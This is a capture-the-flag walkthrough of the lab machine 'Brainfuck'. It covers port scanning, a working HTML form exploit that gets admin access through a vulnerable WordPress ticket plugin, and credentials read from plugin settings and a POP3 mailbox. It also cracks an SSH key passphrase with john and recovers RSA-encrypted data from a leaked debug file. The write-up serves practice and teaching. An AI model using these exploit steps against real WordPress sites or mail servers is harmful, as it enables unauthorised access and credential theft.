Brainfuck
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.17 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Sun Sep 11 19:33:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.050s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https
# Nmap done at Sun Sep 11 19:34:13 2022 -- 1 IP address (1 host up) scanned in 26.61 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,25,110,143,443 10.10.10.17 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Sep 11 19:35:23 2022 as: nmap -sCV -p22,25,110,143,443 -oN targeted 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL CAPA AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR capabilities more LOGIN-REFERRALS LITERAL+ ENABLE ID have Pre-login listed post-login IDLE AUTH=PLAINA0001 OK
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 11 19:36:15 2022 -- 1 IP address (1 host up) scanned in 52.24 secondsThere is an HTTPS website on port 443, and nmap reported that there are two subdomains called www.brainfuck.htb and sup3rs3cr3t.brainfuck.htb. Let's add both to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.17 brainfuck.htb www.brainfuck.htb sup3rs3cr3t.brainfuck.htbWe can see with whatweb, that the website is a WordPress CMS.
whatweb https://brainfuck.htb
https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]If we take a look at the website, we'll see a post made by the admin user, saying that the SMTP service is available, and the message include the orestis@brainfuck.htb email address.
The other domain name shows a forum page.
Let's run wpscan to enumerate the WordPress site.
wpscan --url https://brainfuck.htb -e vp --disable-tls-checks -o wpScan
--urlURL of the WordPress site.-e apenumerate all plugins.--disable-tls-checksdisables SSL/TLS certificate verification.-osave result to a file.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Mon Sep 12 00:20:20 2022
Interesting Finding(s):
...
[i] Plugin(s) Identified:
[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
...Exploitation
There is one plugin installed called wp-support-plus-responsive-ticket-system, in the 7.1.3 version. Let's search for any common vulnerabilities.
searchsploit wordpress plus responsive ticket 7.1.3
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | php/webapps/40939.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsThere is a way to escalate privileges. First, we'll have to make the index.html file with the following code.
nano index.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>Now, set an HTTP server on the current directory with PHP on port 1234.
php -S localhost:1234
-Srun with built-in web server.
Now access the web server with the browser, and press the Login button.
If we access the /wp-admin directory, we'll be able to see the WordPress dashboard.
I tried ways to get remote command execution, like modifying the 404.php file, or uploading a custom plugin, but none of those worked. But if we go to the Plugins section, we'll see one called Easy WP SMTP.
In the Settings option, we'll see that the emails are sent by orestis@brainfuck.htb.
But we can also see the username orestis and the kHGuERB29DNiNE password.
Now that we have credentials for the SMTP server, let's see if there are any emails in the orestis user inbox.
nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.There are two emails. The first one just says that the WordPress site is available.
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
https://brainfuck.htb
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
We hope you enjoy your new site. Thanks!
--The WordPress Team
https://wordpress.org/
.But the second one have another credentials.
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
.These credentials are valid for login page of the forum website.
Now we can see three discussions.
The Key discussion looks to be encrypted.
It could be encrypted with the Vigenère cipher. There is one specific message where it looks like there is a URL.
Let's use dcode.fr to decode the message. Paste the message, and press on AUTOMATIC DECRYPTION.
In the results, we'll see a link to a private SSH key.
Download the id_rsa file from the link. If we take a look at the key, we'll see that it is encrypted. Let's try to break it with john. First, create a hash for the id_rsa file, and put it in the id_rsa.hash file.
ssh2john id_rsa > id_rsa.hash
Then, break it with john.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:13 DONE (2022-09-12 01:35) 0.07490g/s 933364p/s 933364c/s 933364C/s 3poulakia!..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Finally, give the id_rsa file the right permissions, and get a shell as the orestis user. Then we'll be able to grab the user flag.
chmod 600 id_rsa
ssh -i id_rsa orestis@10.10.10.17
Enter passphrase for key 'id_rsa': 3poulakia!
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Wed May 3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ whoami
orestis
orestis@brainfuck:~$ cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9Privilege Escalation
If we look in the current directory, we'll see a file called encrypt.sage with the following code.
cat encrypt.sage
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')There is also the debug.txt file with the values of the p, q and e variables.
cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997And the output.txt file which contains the /root/root.txt file encrypted.
cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182We have all the values needed to calculate the root flag. Go to cryptool.org, and put the values of p and q.
Then, paste the value of e.
And the encrypted flag in the Ciphertext field. Make sure the arrow is pointing up.
Now, we'll have to convert the plaintext string to hexadecimal.
python3 -c "print(hex(24604052029401386049980296953784287079059245867880966944246662849341507003750))"
0x3665666331613564626238393034373531636536353636613330356262386566Finally, if we decode the string, all we have to do is reap the harvest and take the root flag.
echo "0x3665666331613564626238393034373531636536353636613330356262386566" | xxd -r -p
6efc1a5dbb8904751ce6566a305bb8efLast updated
Was this helpful?